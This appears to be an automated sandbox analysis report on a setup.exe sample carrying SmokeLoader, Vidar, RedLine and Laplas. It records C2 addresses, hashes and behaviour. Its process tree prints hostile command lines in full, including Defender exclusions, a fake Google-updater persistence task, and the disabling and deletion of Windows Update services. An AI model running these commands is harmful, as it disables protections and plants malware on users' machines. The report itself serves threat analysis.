Analysis
-
max time kernel
81s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
12-04-2023 00:48
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
setup.exe
Resource
win10v2004-20230221-en
General
-
Target
setup.exe
-
Size
212KB
-
MD5
fcc55ffad5319dabad00bd936426ce23
-
SHA1
bb4ddf38155b94d39f53d1bfeea0fed0fba78643
-
SHA256
58afa429515b1ab08ec566ba3f57f2beb1b843e8c7a3d98c50c96720f27b9888
-
SHA512
a70cdf13e36f36e16e4b5d525aece9f2f741ee538d540a53c09a246eab87c6a2c6a3c4050d69606dd469256f8924a25376f93a248637accc6558133f2644d0cd
-
SSDEEP
3072:xTvt+gc+g9Tw2DZmIjpsEnWjJ/Af7z0snnwUoIK6nGIHLm5Nlmm1J:BF+gETw295nW/C74swUoIlJKd1
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
vidar
3.4
e749025c61b2caca10aa829a9e1a65a1
https://steamcommunity.com/profiles/76561199494593681
https://t.me/auftriebs
-
profile_id_v2
e749025c61b2caca10aa829a9e1a65a1
-
user_agent
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Extracted
redline
build03
65.21.3.192:32845
-
auth_value
688766d7eb9d4a5fde1dec6cdf7c3d9e
Extracted
laplas
http://185.106.92.74
-
api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1764 created 3144 1764 Tzairumea840.exe 55 -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 49814751490089742074.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation FDDE.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation EA45.exe -
Executes dropped EXE 7 IoCs
pid Process 3104 EA45.exe 1640 FDDE.exe 3420 19969450223767851399.exe 4588 49814751490089742074.exe 1404 svcservice.exe 1764 Tzairumea840.exe 1316 FDDE.exe -
Loads dropped DLL 2 IoCs
pid Process 3104 EA45.exe 3104 EA45.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000a000000023179-293.dat upx behavioral2/files/0x000a000000023179-295.dat upx behavioral2/files/0x000a000000023179-296.dat upx behavioral2/memory/3420-298-0x0000000000C20000-0x0000000001A83000-memory.dmp upx behavioral2/memory/3420-299-0x0000000000C20000-0x0000000001A83000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 49814751490089742074.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xrdsu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Ygpxl\\Xrdsu.exe\"" FDDE.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4588 49814751490089742074.exe 4588 49814751490089742074.exe 1404 svcservice.exe 1404 svcservice.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1640 set thread context of 1316 1640 FDDE.exe 118 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3104 sc.exe 2412 sc.exe 2388 sc.exe 3980 sc.exe 3784 sc.exe 2720 sc.exe 3076 sc.exe 3800 sc.exe 4964 sc.exe 4528 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3784 3104 WerFault.exe 91 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 EA45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EA45.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4528 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2772 setup.exe 2772 setup.exe 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3144 Explorer.EXE -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 2772 setup.exe 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1640 FDDE.exe Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeDebugPrivilege 2564 powershell.exe Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeDebugPrivilege 3612 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3144 wrote to memory of 3104 3144 Explorer.EXE 91 PID 3144 wrote to memory of 3104 3144 Explorer.EXE 91 PID 3144 wrote to memory of 3104 3144 Explorer.EXE 91 PID 3144 wrote to memory of 1640 3144 Explorer.EXE 93 PID 3144 wrote to memory of 1640 3144 Explorer.EXE 93 PID 3144 wrote to memory of 1640 3144 Explorer.EXE 93 PID 3144 wrote to memory of 1128 3144 Explorer.EXE 94 PID 3144 wrote to memory of 1128 3144 Explorer.EXE 94 PID 3144 wrote to memory of 1128 3144 Explorer.EXE 94 PID 3144 wrote to memory of 1128 3144 Explorer.EXE 94 PID 3144 wrote to memory of 4356 3144 Explorer.EXE 95 PID 3144 wrote to memory of 4356 3144 Explorer.EXE 95 PID 3144 wrote to memory of 4356 3144 Explorer.EXE 95 PID 3144 wrote to memory of 2348 3144 Explorer.EXE 96 PID 3144 wrote to memory of 2348 3144 Explorer.EXE 96 PID 3144 wrote to memory of 2348 3144 Explorer.EXE 96 PID 3144 wrote to memory of 2348 3144 Explorer.EXE 96 PID 3144 wrote to memory of 1776 3144 Explorer.EXE 98 PID 3144 wrote to memory of 1776 3144 Explorer.EXE 98 PID 3144 wrote to memory of 1776 3144 Explorer.EXE 98 PID 1640 wrote to memory of 2564 1640 FDDE.exe 97 PID 1640 wrote to memory of 2564 1640 FDDE.exe 97 PID 1640 wrote to memory of 2564 1640 FDDE.exe 97 PID 3144 wrote to memory of 1156 3144 Explorer.EXE 100 PID 3144 wrote to memory of 1156 3144 Explorer.EXE 100 PID 3144 wrote to memory of 1156 3144 Explorer.EXE 100 PID 3144 wrote to memory of 1156 3144 Explorer.EXE 100 PID 3144 wrote to memory of 2772 3144 Explorer.EXE 101 PID 3144 wrote to memory of 2772 3144 Explorer.EXE 101 PID 3144 wrote to memory of 2772 3144 Explorer.EXE 101 PID 3144 wrote to memory of 2772 3144 Explorer.EXE 101 PID 3144 wrote to memory of 2024 3144 Explorer.EXE 102 PID 3144 wrote to memory of 2024 3144 Explorer.EXE 102 PID 3144 wrote to memory of 2024 3144 Explorer.EXE 102 PID 3144 wrote to memory of 2024 3144 Explorer.EXE 102 PID 3144 wrote to memory of 4948 3144 Explorer.EXE 103 PID 3144 wrote to memory of 4948 3144 Explorer.EXE 103 PID 3144 wrote to memory of 4948 3144 Explorer.EXE 103 PID 3144 wrote to memory of 3456 3144 Explorer.EXE 104 PID 3144 wrote to memory of 3456 3144 Explorer.EXE 104 PID 3144 wrote to memory of 3456 3144 Explorer.EXE 104 PID 3144 wrote to memory of 3456 3144 Explorer.EXE 104 PID 3104 wrote to memory of 3420 3104 EA45.exe 105 PID 3104 wrote to memory of 3420 3104 EA45.exe 105 PID 3420 wrote to memory of 2480 3420 19969450223767851399.exe 107 PID 3420 wrote to memory of 2480 3420 19969450223767851399.exe 107 PID 2480 wrote to memory of 4256 2480 cmd.exe 109 PID 2480 wrote to memory of 4256 2480 cmd.exe 109 PID 3104 wrote to memory of 4588 3104 EA45.exe 110 PID 3104 wrote to memory of 4588 3104 EA45.exe 110 PID 3104 wrote to memory of 4588 3104 EA45.exe 110 PID 3104 wrote to memory of 1920 3104 EA45.exe 111 PID 3104 wrote to memory of 1920 3104 EA45.exe 111 PID 3104 wrote to memory of 1920 3104 EA45.exe 111 PID 1920 wrote to memory of 4528 1920 cmd.exe 115 PID 1920 wrote to memory of 4528 1920 cmd.exe 115 PID 1920 wrote to memory of 4528 1920 cmd.exe 115 PID 4588 wrote to memory of 1404 4588 49814751490089742074.exe 116 PID 4588 wrote to memory of 1404 4588 49814751490089742074.exe 116 PID 4588 wrote to memory of 1404 4588 49814751490089742074.exe 116 PID 1640 wrote to memory of 1764 1640 FDDE.exe 117 PID 1640 wrote to memory of 1764 1640 FDDE.exe 117 PID 1640 wrote to memory of 1316 1640 FDDE.exe 118 PID 1640 wrote to memory of 1316 1640 FDDE.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\EA45.exeC:\Users\Admin\AppData\Local\Temp\EA45.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\ProgramData\19969450223767851399.exe"C:\ProgramData\19969450223767851399.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\19969450223767851399.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵PID:4256
-
-
-
-
C:\ProgramData\49814751490089742074.exe"C:\ProgramData\49814751490089742074.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EA45.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4528
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 22643⤵
- Program crash
PID:3784
-
-
-
C:\Users\Admin\AppData\Local\Temp\FDDE.exeC:\Users\Admin\AppData\Local\Temp\FDDE.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\FDDE.exeC:\Users\Admin\AppData\Local\Temp\FDDE.exe3⤵
- Executes dropped EXE
PID:1316
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1128
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4356
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2348
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1776
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1156
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2772
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2024
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4948
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵PID:4308
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3268
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4944
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:876
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4880
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1224
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1056
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3980
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4528
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3784
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3104
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2412
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4468
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4548
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2744
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3080
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4188
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yqhkxrl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵PID:2124
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3404
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:772
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:4580
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3076
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3800
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4964
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3596
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4824
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:4128
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3500
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3964
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4960
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4296
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵PID:4036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3104 -ip 31041⤵PID:4276
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:1648
-
C:\Users\Admin\AppData\Roaming\scfuusaC:\Users\Admin\AppData\Roaming\scfuusa1⤵PID:4180
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD558fe5c1f5bb97d2ab8c07d9b2165d291
SHA17fa1fd096e3e299a1d12620afb5f0e8bbac501fc
SHA2569ec7b6c726d9cafca8ab233f83133e06adf5a8af6898197ffc7c5ef54b402694
SHA512ee7532ef1d4903eb4a6fddca47774358a67904ec49cbc700a2161c9f1f372bd02679fbeb4bada5cb6d940946084b080f7bbc138d4a8202fdbed5b9a8bc377e01
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
Filesize
1KB
MD513b08803e0bb671919478d178f19d6e2
SHA19f8c1d2a16446f9ee1e3244f48d372aecccf4dd9
SHA256bab001392f6a9fc257a302cf557c9f571c7b352f41aedda14b049976ee5fd1c9
